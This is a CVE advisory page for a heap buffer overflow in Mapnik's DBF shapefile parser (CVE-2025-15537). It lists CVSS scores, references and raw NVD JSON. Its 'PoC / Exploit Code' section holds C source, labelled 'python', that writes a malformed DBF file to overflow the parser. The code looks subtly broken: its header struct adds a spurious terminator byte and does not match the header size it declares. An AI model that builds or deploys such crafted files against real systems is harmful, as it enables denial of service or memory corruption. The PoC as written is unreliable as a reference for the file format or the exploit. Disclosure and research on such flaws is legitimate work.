CVE-2025-15537

Description

A security vulnerability has been detected in Mapnik up to 4.2.0. This issue affects the function mapnik::dbf_file::string_value of the file plugins/input/shape/dbfile.cpp. Such manipulation leads to heap-based buffer overflow. The attack must be carried out locally. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:mapnik:mapnik:*:*:*:*:*:*:*:* - VULNERABLE

Mapnik <= 4.2.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * CVE-2025-15537 PoC - Mapnik heap-based buffer overflow in dbf_file::string_value
 * Target: Mapnik <= 4.2.0
 * File: plugins/input/shape/dbfile.cpp
 * 
 * This PoC generates a malicious DBF file with oversized string field
 * that triggers heap buffer overflow when parsed by Mapnik.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#pragma pack(push, 1)
typedef struct {
    char terminator;      // 0x0D
    char version;         // 0x03 (dBASE III)
    uint8_t year;         // Year - 1900
    uint8_t month;
    uint8_t day;
    uint32_t record_count;
    uint16_t header_size;
    uint16_t record_size;
} dbf_header_t;

typedef struct {
    char name[11];        // Field name
    char type;            // 'C' for character
    uint32_t reserved1;
    uint8_t length;
    uint8_t decimal_count;
    uint16_t reserved2;
    uint8_t work_area_id;
    uint16_t reserved3;
    char set_fields_flag;
    char reserved4[8];
} dbf_field_descriptor_t;

typedef struct {
    char deletion_flag;
    char data[1];
} dbf_record_t;
#pragma pack(pop)

void create_malicious_dbf(const char* filename) {
    FILE* fp = fopen(filename, "wb");
    if (!fp) {
        perror("Failed to open file");
        return;
    }
    
    // Create header with oversized field
    dbf_header_t header;
    memset(&header, 0, sizeof(header));
    header.terminator = 0x0D;
    header.version = 0x03;
    header.year = 126;  // 2026 - 1900
    header.month = 1;
    header.day = 18;
    header.record_count = 1;
    header.header_size = 32 + 32 + 1;  // header + 1 field + EOF marker
    header.record_size = 1000;  // Oversized record size
    
    fwrite(&header, sizeof(header), 1, fp);
    
    // Create field descriptor with oversized length
    dbf_field_descriptor_t field;
    memset(&field, 0, sizeof(field));
    strncpy(field.name, "OVERFLOW", 11);
    field.type = 'C';
    field.length = 255;  // Oversized field length
    field.decimal_count = 0;
    
    fwrite(&field, sizeof(field), 1, fp);
    
    // EOF marker
    char eof = 0x1A;
    fwrite(&eof, 1, 1, fp);
    
    // Create record with overflow data
    char record[1000];
    memset(record, 0, sizeof(record));
    record[0] = ' ';  // Deletion flag (not deleted)
    // Fill with 'A' characters to trigger overflow
    memset(record + 1, 'A', 998);
    
    fwrite(record, sizeof(record), 1, fp);
    
    fclose(fp);
    printf("Malicious DBF file created: %s\n", filename);
    printf("Field length: 255, Record size: 1000\n");
}

int main(int argc, char* argv[]) {
    const char* filename = (argc > 1) ? argv[1] : "malicious.dbf";
    create_malicious_dbf(filename);
    printf("PoC for CVE-2025-15537\n");
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15537
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15537
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15537/
[4] VulDB https://vuldb.com/cve/CVE-2025-15537
[5] https://github.com/mapnik/mapnik/
[6] https://github.com/mapnik/mapnik/issues/4543
[7] https://github.com/oneafter/1218/blob/main/repro
[8] https://vuldb.com/?ctiid.341709
[9] https://vuldb.com/?id.341709
[10] https://vuldb.com/?submit.733348
[11] https://github.com/mapnik/mapnik/issues/4543

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15537", "sourceIdentifier": "[email protected]", "published": "2026-01-18T10:15:52.103", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in Mapnik up to 4.2.0. This issue affects the function mapnik::dbf_file::string_value of the file plugins/input/shape/dbfile.cpp. Such manipulation leads to heap-based buffer overflow. The attack must be carried out locally. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet."}, {"lang": "es", "value": "Se ha detectado una vulnerabilidad de seguridad en Mapnik hasta la versión 4.2.0. Este problema afecta a la función mapnik::dbf_file::string_value del archivo plugins/input/shape/dbfile.cpp. Dicha manipulación conduce a un desbordamiento de búfer basado en montículo. El ataque debe llevarse a cabo localmente. El exploit ha sido divulgado públicamente y puede ser utilizado. El proyecto fue informado del problema tempranamente a través de un informe de problema, pero aún no ha respondido."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 4.3, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 3.1, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-122"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mapnik:mapnik:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.2.0", "matchCriteriaId": "0FC0A488-20FD-464C-BEF0-5E513039CA2D"}]}]}], "references": [{"url": "https://github.com/mapnik/mapnik/", "source": "[email protected]"}, {"url": "https://github.com/mapnik/mapnik/issues/4543", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/oneafter/1218 ... (truncated)